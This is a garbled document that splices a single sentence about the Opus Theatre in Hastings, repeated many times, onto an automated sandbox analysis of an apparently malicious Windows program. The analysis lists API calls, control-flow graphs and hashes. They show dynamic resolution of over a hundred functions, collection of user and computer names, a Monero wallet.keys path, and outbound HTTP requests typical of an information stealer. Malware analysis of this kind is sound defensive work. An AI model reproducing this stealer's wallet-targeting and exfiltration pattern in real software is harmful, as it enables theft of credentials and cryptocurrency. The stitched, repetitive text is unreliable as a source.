2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: cf02b62878baa38ea0d13ee53d4c86ecd0114ad385026bce1a8091ff7849cfae
                  • Instruction ID: 45e27e05ff24efccd2a9e465eb3198e973364d857726ebb6da1889546063be10
                  • Opcode Fuzzy Hash: cf02b62878baa38ea0d13ee53d4c86ecd0114ad385026bce1a8091ff7849cfae
                  • Instruction Fuzzy Hash: 8B4158607E26957FC63CFBA4BD6EE9D7792DF4A720FD072C2EE0892290DBB095004525

                  Control-flow Graph
                  control_flow_graph 801 b04880-b04942 call b1a7a0 call b047b0 call b1a740 * 5 InternetOpenA StrCmpCA 816 b04944 801->816 817 b0494b-b0494f 801->817 816->817 818 b04955-b04acd call b18b60 call b1a920 call b1a8a0 call b1a800 * 2 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a920 call b1a8a0 call b1a800 * 2 InternetConnectA 817->818 819 b04ecb-b04ef3 InternetCloseHandle call b1aad0 call b09ac0 817->819 818->819 905 b04ad3-b04ad7 818->905 829 b04f32-b04fa2 call b18990 * 2 call b1a7a0 call b1a800 * 8 819->829 830 b04ef5-b04f2d call b1a820 call b1a9b0 call b1a8a0 call b1a800 819->830 830->829 906 b04ae5 905->906 907 b04ad9-b04ae3 905->907 908 b04aef-b04b22 HttpOpenRequestA 906->908 907->908 909 b04b28-b04e28 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a740 call b1a920 * 2 call b1a8a0 call b1a800 * 2 call b1aad0 lstrlen call b1aad0 * 2 lstrlen call b1aad0 HttpSendRequestA 908->909 910 b04ebe-b04ec5 InternetCloseHandle 908->910 1021 b04e32-b04e5c InternetReadFile 909->1021 910->819 1022 b04e67-b04eb9 InternetCloseHandle call b1a800 1021->1022 1023 b04e5e-b04e65 1021->1023 1022->910 1023->1022 1024 b04e69-b04ea7 call b1a9b0 call b1a8a0 call b1a800 1023->1024 1024->1021
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                    • Part of subcall function 00B047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B04915
                  • StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B0493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B04ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00B20DDB,00000000,?,?,00000000,?,",00000000,?,011FE2A0), ref: 00B04DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B04E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B04E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B04E49
                  • InternetCloseHandle.WININET(00000000), ref: 00B04EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00B04EC5
                  • HttpOpenRequestA.WININET(00000000,011FE310,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B04B15
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • InternetCloseHandle.WININET(00000000), ref: 00B04ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 97253faf97e1564aee4f09b9f38fe0212e9ede53ec6ee9667bfb7a5c3e664320
                  • Instruction ID: 60d27d86b05e1729802382781a0f120e0d3cea5ba5931ca6f9f4918756f65008
                  • Opcode Fuzzy Hash: 97253faf97e1564aee4f09b9f38fe0212e9ede53ec6ee9667bfb7a5c3e664320
                  • Instruction Fuzzy Hash: 1912DD71911218AADB15EB94DD92FEEB7B8AF15310F9041D9B10672091EF703F8ACF62
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00B1792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 78e61cba5273c0dd315b1b518f76e43ec4965489d30f9420de8f7d5d5eb2e56d
                  • Instruction ID: 4fdcde233d229c27a1f93686157a9ec35a959a7add653fe9d109370e4663810c
                  • Opcode Fuzzy Hash: 78e61cba5273c0dd315b1b518f76e43ec4965489d30f9420de8f7d5d5eb2e56d
                  • Instruction Fuzzy Hash: 3B0186B1948304EBC700DF98DD45BAABBF8F705B51F50429AF545E3380C77459448BA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B011B7), ref: 00B17880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B1789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 484639f991f3da8d8e4f6491d035fac77e757022a923f2707c62d8338fc05b0c
                  • Instruction ID: c1d989c2e21ba4308b09c6f2168c237c350911e0ffb61230ab1c57e362e9cd16
                  • Opcode Fuzzy Hash: 484639f991f3da8d8e4f6491d035fac77e757022a923f2707c62d8338fc05b0c
                  • Instruction Fuzzy Hash: F1F04FB5984208ABC710DF99DD49BAEBBF8EB05711F10025AFA05E3780C77419448BA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 6c1fb9e9fb35f116b5be9b2f958a9c025fae1272e3f861a2b9c7b01b15f85e15
                  • Instruction ID: 4f0cdea0ca4a583753cc5441e2f85260b4a9f8644319d93c922a160fc0d865d7
                  • Opcode Fuzzy Hash: 6c1fb9e9fb35f116b5be9b2f958a9c025fae1272e3f861a2b9c7b01b15f85e15
                  • Instruction Fuzzy Hash: F0D05E7894030CDBCB14DFE4D8496DDBBB8FB09311F000594E905B2340EA306481CAB6

                  Control-flow Graph
                  control_flow_graph 633 b19c10-b19c1a 634 b19c20-b1a031 GetProcAddress * 43 633->634 635 b1a036-b1a0ca LoadLibraryA * 8 633->635 634->635 636 b1a146-b1a14d 635->636 637 b1a0cc-b1a141 GetProcAddress * 5 635->637 638 b1a153-b1a211 GetProcAddress * 8 636->638 639 b1a216-b1a21d 636->639 637->636 638->639 640 b1a298-b1a29f 639->640 641 b1a21f-b1a293 GetProcAddress * 5 639->641 642 b1a2a5-b1a332 GetProcAddress * 6 640->642 643 b1a337-b1a33e 640->643 641->640 642->643 644 b1a344-b1a41a GetProcAddress * 9 643->644 645 b1a41f-b1a426 643->645 644->645 646 b1a4a2-b1a4a9 645->646 647 b1a428-b1a49d GetProcAddress * 5 645->647 648 b1a4ab-b1a4d7 GetProcAddress * 2 646->648 649 b1a4dc-b1a4e3 646->649 647->646 648->649 650 b1a515-b1a51c 649->650 651 b1a4e5-b1a510 GetProcAddress * 2 649->651 652 b1a612-b1a619 650->652 653 b1a522-b1a60d GetProcAddress * 10 650->653 651->650 654 b1a61b-b1a678 GetProcAddress * 4 652->654 655 b1a67d-b1a684 652->655 653->652 654->655 656 b1a686-b1a699 GetProcAddress 655->656 657 b1a69e-b1a6a5 655->657 656->657 658 b1a6a7-b1a703 GetProcAddress * 4 657->658 659 b1a708-b1a709 657->659 658->659
                  APIs
                  • GetProcAddress.KERNEL32(75900000,011E64E0), ref: 00B19C2D
                  • GetProcAddress.KERNEL32(75900000,011E6600), ref: 00B19C45
                  • GetProcAddress.KERNEL32(75900000,011F8D00), ref: 00B19C5E
                  • GetProcAddress.KERNEL32(75900000,011F8D18), ref: 00B19C76
                  • GetProcAddress.KERNEL32(75900000,011FCF48), ref: 00B19C8E
                  • GetProcAddress.KERNEL32(75900000,011FCEE8), ref: 00B19CA7
                  • GetProcAddress.KERNEL32(75900000,011EAFC8), ref: 00B19CBF
                  • GetProcAddress.KERNEL32(75900000,011FCFC0), ref: 00B19CD7
                  • GetProcAddress.KERNEL32(75900000,011FCE10), ref: 00B19CF0
                  • GetProcAddress.KERNEL32(75900000,011FCF00), ref: 00B19D08
                  • GetProcAddress.KERNEL32(75900000,011FCF30), ref: 00B19D20
                  • GetProcAddress.KERNEL32(75900000,011E6560), ref: 00B19D39
                  • GetProcAddress.KERNEL32(75900000,011E6620), ref: 00B19D51
                  • GetProcAddress.KERNEL32(75900000,011E6280), ref: 00B19D69
                  • GetProcAddress.KERNEL32(75900000,011E63A0), ref: 00B19D82
                  • GetProcAddress.KERNEL32(75900000,011FCF60), ref: 00B19D9A
                  • GetProcAddress.KERNEL32(75900000,011FCE70), ref: 00B19DB2
                  • GetProcAddress.KERNEL32(75900000,011EAFF0), ref: 00B19DCB
                  • GetProcAddress.KERNEL32(75900000,011E62C0), ref: 00B19DE3
                  • GetProcAddress.KERNEL32(75900000,011FCEB8), ref: 00B19DFB
                  • GetProcAddress.KERNEL32(75900000,011FCF78), ref: 00B19E14
                  • GetProcAddress.KERNEL32(75900000,011FCE28), ref: 00B19E2C
                  • GetProcAddress.KERNEL32(75900000,011FCEA0), ref: 00B19E44
                  • GetProcAddress.KERNEL32(75900000,011E62E0), ref: 00B19E5D
                  • GetProcAddress.KERNEL32(75900000,011FCE40), ref: 00B19E75
                  • GetProcAddress.KERNEL32(75900000,011FCF90), ref: 00B19E8D
                  • GetProcAddress.KERNEL32(75900000,011FCE88), ref: 00B19EA6
                  • GetProcAddress.KERNEL32(75900000,011FCED0), ref: 00B19EBE
                  • GetProcAddress.KERNEL32(75900000,011FCE58), ref: 00B19ED6
                  • GetProcAddress.KERNEL32(75900000,011FCF18), ref: 00B19EEF
                  • GetProcAddress.KERNEL32(75900000,011FCFA8), ref: 00B19F07
                  • GetProcAddress.KERNEL32(75900000,011FC810), ref: 00B19F1F
                  • GetProcAddress.KERNEL32(75900000,011FCAC8), ref: 00B19F38
                  • GetProcAddress.KERNEL32(75900000,011F9F38), ref: 00B19F50
                  • GetProcAddress.KERNEL32(75900000,011FC858), ref: 00B19F68
                  • GetProcAddress.KERNEL32(75900000,011FCAE0), ref: 00B19F81
                  • GetProcAddress.KERNEL32(75900000,011E6300), ref: 00B19F99
                  • GetProcAddress.KERNEL32(75900000,011FC948), ref: 00B19FB1
                  • GetProcAddress.KERNEL32(75900000,011E6360), ref: 00B19FCA
                  • GetProcAddress.KERNEL32(75900000,011FC990), ref: 00B19FE2
                  • GetProcAddress.KERNEL32(75900000,011FC930), ref: 00B19FFA
                  • GetProcAddress.KERNEL32(75900000,011E63E0), ref: 00B1A013
                  • GetProcAddress.KERNEL32(75900000,011E6460), ref: 00B1A02B
                  • LoadLibraryA.KERNEL32(011FC960,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A03D
                  • LoadLibraryA.KERNEL32(011FCA68,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A04E
                  • LoadLibraryA.KERNEL32(011FC870,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A060
                  • LoadLibraryA.KERNEL32(011FCA80,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A072
                  • LoadLibraryA.KERNEL32(011FCA20,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A083
                  • LoadLibraryA.KERNEL32(011FC9A8,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A095
                  • LoadLibraryA.KERNEL32(011FC840,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A0A7
                  • LoadLibraryA.KERNEL32(011FCAF8,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A0B8
                  • GetProcAddress.KERNEL32(75FD0000,011E6A20), ref: 00B1A0DA
                  • GetProcAddress.KERNEL32(75FD0000,011FC978), ref: 00B1A0F2
                  • GetProcAddress.KERNEL32(75FD0000,011F8940), ref: 00B1A10A
                  • GetProcAddress.KERNEL32(75FD0000,011FC9C0), ref: 00B1A123
                  • GetProcAddress.KERNEL32(75FD0000,011E68A0), ref: 00B1A13B
                  • GetProcAddress.KERNEL32(734B0000,011EB1D0), ref: 00B1A160
                  • GetProcAddress.KERNEL32(734B0000,011E6780), ref: 00B1A179
                  • GetProcAddress.KERNEL32(734B0000,011EB220), ref: 00B1A191
                  • GetProcAddress.KERNEL32(734B0000,011FC888), ref: 00B1A1A9
                  • GetProcAddress.KERNEL32(734B0000,011FCA98), ref: 00B1A1C2
                  • GetProcAddress.KERNEL32(734B0000,011E6940), ref: 00B1A1DA
                  • GetProcAddress.KERNEL32(734B0000,011E6860), ref: 00B1A1F2
                  • GetProcAddress.KERNEL32(734B0000,011FCA50), ref: 00B1A20B
                  • GetProcAddress.KERNEL32(763B0000,011E67E0), ref: 00B1A22C
                  • GetProcAddress.KERNEL32(763B0000,011E67A0), ref: 00B1A244
                  • GetProcAddress.KERNEL32(763B0000,011FC8A0), ref: 00B1A25D
                  • GetProcAddress.KERNEL32(763B0000,011FC828), ref: 00B1A275
                  • GetProcAddress.KERNEL32(763B0000,011E6800), ref: 00B1A28D
                  • GetProcAddress.KERNEL32(750F0000,011EB018), ref: 00B1A2B3
                  • GetProcAddress.KERNEL32(750F0000,011EB040), ref: 00B1A2CB
                  • GetProcAddress.KERNEL32(750F0000,011FC8B8), ref: 00B1A2E3
                  • GetProcAddress.KERNEL32(750F0000,011E6900), ref: 00B1A2FC
                  • GetProcAddress.KERNEL32(750F0000,011E6A00), ref: 00B1A314
                  • GetProcAddress.KERNEL32(750F0000,011EB1A8), ref: 00B1A32C
                  • GetProcAddress.KERNEL32(75A50000,011FC9D8), ref: 00B1A352
                  • GetProcAddress.KERNEL32(75A50000,011E68C0), ref: 00B1A36A
                  • GetProcAddress.KERNEL32(75A50000,011F8840), ref: 00B1A382
                  • GetProcAddress.KERNEL32(75A50000,011FCAB0), ref: 00B1A39B
                  • GetProcAddress.KERNEL32(75A50000,011FC8D0), ref: 00B1A3B3
                  • GetProcAddress.KERNEL32(75A50000,011E67C0), ref: 00B1A3CB
                  • GetProcAddress.KERNEL32(75A50000,011E69A0), ref: 00B1A3E4
                  • GetProcAddress.KERNEL32(75A50000,011FCA38), ref: 00B1A3FC
                  • GetProcAddress.KERNEL32(75A50000,011FC9F0), ref: 00B1A414
                  • GetProcAddress.KERNEL32(75070000,011E6960), ref: 00B1A436
                  • GetProcAddress.KERNEL32(75070000,011FC8E8), ref: 00B1A44E
                  • GetProcAddress.KERNEL32(75070000,011FCA08), ref: 00B1A466
                  • GetProcAddress.KERNEL32(75070000,011FC900), ref: 00B1A47F
                  • GetProcAddress.KERNEL32(75070000,011FC918), ref: 00B1A497
                  • GetProcAddress.KERNEL32(74E50000,011E6880), ref: 00B1A4B8
                  • GetProcAddress.KERNEL32(74E50000,011E6980), ref: 00B1A4D1
                  • GetProcAddress.KERNEL32(75320000,011E69C0), ref: 00B1A4F2
                  • GetProcAddress.KERNEL32(75320000,011FCC30), ref: 00B1A50A
                  • GetProcAddress.KERNEL32(6F060000,011E6820), ref: 00B1A530
                  • GetProcAddress.KERNEL32(6F060000,011E69E0), ref: 00B1A548
                  • GetProcAddress.KERNEL32(6F060000,011E66C0), ref: 00B1A560
                  • GetProcAddress.KERNEL32(6F060000,011FCD80), ref: 00B1A579
                  • GetProcAddress.KERNEL32(6F060000,011E6680), ref: 00B1A591
                  • GetProcAddress.KERNEL32(6F060000,011E6720), ref: 00B1A5A9
                  • GetProcAddress.KERNEL32(6F060000,011E6920), ref: 00B1A5C2
                  • GetProcAddress.KERNEL32(6F060000,011E68E0), ref: 00B1A5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00B1A5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00B1A607
                  • GetProcAddress.KERNEL32(74E00000,011FCB70), ref: 00B1A629
                  • GetProcAddress.KERNEL32(74E00000,011F8800), ref: 00B1A641
                  • GetProcAddress.KERNEL32(74E00000,011FCBD0), ref: 00B1A659
                  • GetProcAddress.KERNEL32(74E00000,011FCD08), ref: 00B1A672
                  • GetProcAddress.KERNEL32(74DF0000,011E66A0), ref: 00B1A693
                  • GetProcAddress.KERNEL32(6E320000,011FCC48), ref: 00B1A6B4
                  • GetProcAddress.KERNEL32(6E320000,011E66E0), ref: 00B1A6CD
                  • GetProcAddress.KERNEL32(6E320000,011FCC00), ref: 00B1A6E5
                  • GetProcAddress.KERNEL32(6E320000,011FCCA8), ref: 00B1A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: a7cfa14fcb32385896d9d1432287fb87609fd0ef3789fdbe5aaba98e47d3765e
                  • Instruction ID: 917570dc8effb4642cf385c79d7b9d4d4797e15dcdac6720543ad1796c3ff2e9
                  • Opcode Fuzzy Hash: a7cfa14fcb32385896d9d1432287fb87609fd0ef3789fdbe5aaba98e47d3765e
                  • Instruction Fuzzy Hash: 0B62FABD5C0340AFD364DFACED889663BF9F78E601714851AA609C3364D639A841DF72

                  Control-flow Graph

                  • Executed
                  • Not Executed
